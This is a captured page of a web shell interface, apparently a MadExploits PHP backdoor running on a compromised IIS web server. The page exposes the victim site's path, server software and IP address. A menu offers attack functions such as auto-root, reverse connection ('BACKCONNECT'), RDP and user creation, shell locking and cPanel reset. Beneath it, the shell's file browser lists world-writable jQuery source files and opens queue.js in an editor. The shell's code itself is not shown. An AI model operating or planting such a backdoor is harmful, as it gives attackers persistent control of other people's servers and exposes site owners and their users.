Windows NT 5XH5ME 10.0 build 17763 (Windows Server 2016) AMD64
Microsoft-IIS/10.0
: | : 3.137.210.16
Cant Read [ /etc/named.conf ]
8.0.30
IWPD_574(rhy10449)
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
BLACK DEFEND!
README
+ Create Folder
+ Create File
D: /
Inetpub /
vhosts /
rhythmmedical.in /
httpdocs /
superadm /
bower_components /
jquery /
src /
[ HOME SHELL ]
Name
Size
Permission
Action
ajax
[ DIR ]
drwxrwxrwx
attributes
[ DIR ]
drwxrwxrwx
core
[ DIR ]
drwxrwxrwx
css
[ DIR ]
drwxrwxrwx
data
[ DIR ]
drwxrwxrwx
deferred
[ DIR ]
drwxrwxrwx
effects
[ DIR ]
drwxrwxrwx
event
[ DIR ]
drwxrwxrwx
exports
[ DIR ]
drwxrwxrwx
manipulation
[ DIR ]
drwxrwxrwx
queue
[ DIR ]
drwxrwxrwx
traversing
[ DIR ]
drwxrwxrwx
var
[ DIR ]
drwxrwxrwx
.eslintrc.json
60
B
-rw-rw-rw-
ajax.js
21.73
KB
-rw-rw-rw-
attributes.js
217
B
-rw-rw-rw-
callbacks.js
5.38
KB
-rw-rw-rw-
core.js
10.93
KB
-rw-rw-rw-
css.js
11.41
KB
-rw-rw-rw-
data.js
4.2
KB
-rw-rw-rw-
deferred.js
10.61
KB
-rw-rw-rw-
deprecated.js
801
B
-rw-rw-rw-
dimensions.js
1.69
KB
-rw-rw-rw-
effects.js
16.99
KB
-rw-rw-rw-
event.js
18.96
KB
-rw-rw-rw-
jquery.js
640
B
-rw-rw-rw-
manipulation.js
12.21
KB
-rw-rw-rw-
offset.js
6.12
KB
-rw-rw-rw-
queue.js
3.02
KB
-rw-rw-rw-
selector-native.js
6.24
KB
-rw-rw-rw-
selector-sizzle.js
411
B
-rw-rw-rw-
selector.js
66
B
-rw-rw-rw-
serialize.js
3.1
KB
-rw-rw-rw-
traversing.js
4.44
KB
-rw-rw-rw-
wrap.js
1.42
KB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : queue.js
define( [ "./core", "./data/var/dataPriv", "./deferred", "./callbacks" ], function( jQuery, dataPriv ) { "use strict"; jQuery.extend( { queue: function( elem, type, data ) { var queue; if ( elem ) { type = ( type || "fx" ) + "queue"; queue = dataPriv.get( elem, type ); // Speed up dequeue by getting out quickly if this is just a lookup if ( data ) { if ( !queue || Array.isArray( data ) ) { queue = dataPriv.access( elem, type, jQuery.makeArray( data ) ); } else { queue.push( data ); } } return queue || []; } }, dequeue: function( elem, type ) { type = type || "fx"; var queue = jQuery.queue( elem, type ), startLength = queue.length, fn = queue.shift(), hooks = jQuery._queueHooks( elem, type ), next = function() { jQuery.dequeue( elem, type ); }; // If the fx queue is dequeued, always remove the progress sentinel if ( fn === "inprogress" ) { fn = queue.shift(); startLength--; } if ( fn ) { // Add a progress sentinel to prevent the fx queue from being // automatically dequeued if ( type === "fx" ) { queue.unshift( "inprogress" ); } // Clear up the last queue stop function delete hooks.stop; fn.call( elem, next, hooks ); } if ( !startLength && hooks ) { hooks.empty.fire(); } }, // Not public - generate a queueHooks object, or return the current one _queueHooks: function( elem, type ) { var key = type + "queueHooks"; return dataPriv.get( elem, key ) || dataPriv.access( elem, key, { empty: jQuery.Callbacks( "once memory" ).add( function() { dataPriv.remove( elem, [ type + "queue", key ] ); } ) } ); } } ); jQuery.fn.extend( { queue: function( type, data ) { var setter = 2; if ( typeof type !== "string" ) { data = type; type = "fx"; setter--; } if ( arguments.length < setter ) { return jQuery.queue( this[ 0 ], type ); } return data === undefined ? this : this.each( function() { var queue = jQuery.queue( this, type, data ); // Ensure a hooks for this queue jQuery._queueHooks( this, type ); if ( type === "fx" && queue[ 0 ] !== "inprogress" ) { jQuery.dequeue( this, type ); } } ); }, dequeue: function( type ) { return this.each( function() { jQuery.dequeue( this, type ); } ); }, clearQueue: function( type ) { return this.queue( type || "fx", [] ); }, // Get a promise resolved when queues of a certain type // are emptied (fx is the type by default) promise: function( type, obj ) { var tmp, count = 1, defer = jQuery.Deferred(), elements = this, i = this.length, resolve = function() { if ( !( --count ) ) { defer.resolveWith( elements, [ elements ] ); } }; if ( typeof type !== "string" ) { obj = type; type = undefined; } type = type || "fx"; while ( i-- ) { tmp = dataPriv.get( elements[ i ], type + "queueHooks" ); if ( tmp && tmp.empty ) { count++; tmp.empty.add( resolve ); } } resolve(); return defer.promise( obj ); } } ); return jQuery; } );
Close